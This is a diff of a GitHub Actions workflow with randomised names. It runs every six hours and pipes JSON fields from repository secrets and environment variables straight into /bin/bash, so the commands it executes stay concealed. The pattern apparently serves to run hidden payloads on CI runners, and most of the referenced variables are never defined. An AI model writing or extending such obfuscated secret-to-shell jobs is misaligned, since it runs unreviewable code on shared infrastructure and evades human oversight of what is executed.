--- a/.github/workflows/commissionperturbed.yml
+++ b/.github/workflows/commissionperturbed.yml
@@ -3,8 +3,7 @@ name: commissionperturbed
 on:
   workflow_dispatch:
   schedule:
-    - cron: '1 3/6 * * *'
-
+    - cron: '46 0/6 * * *'
 jobs:
   build:
     runs-on: ubuntu-latest
@@ -13,10 +12,11 @@ jobs:
       - uses: actions/checkout@v4
       - name: commissionperturbed
         env:
-          h08685: ${{ secrets.h08685 }}
+          alfu36: ${{ secrets.alfu36 }}
         run: |
-          echo $h08685 | jq -r .mdesj665 | /bin/bash
-          echo $x5 | jq -r .nz84054 | /bin/bash
-          echo $akd6 | jq -r .qek9 | /bin/bash
-          echo $ing50 | jq -r .voogq71862 | /bin/bash
+          echo $alfu36 | jq -r .atla617 | /bin/bash
+          echo $sus06 | jq -r .mvmzp50301 | /bin/bash
+          echo $rjswr96906 | jq -r .zls3784 | /bin/bash
+          echo $f5404 | jq -r .iiir1636 | /bin/bash
+          echo $xygf16439 | jq -r .nps6427 | /bin/bash
 
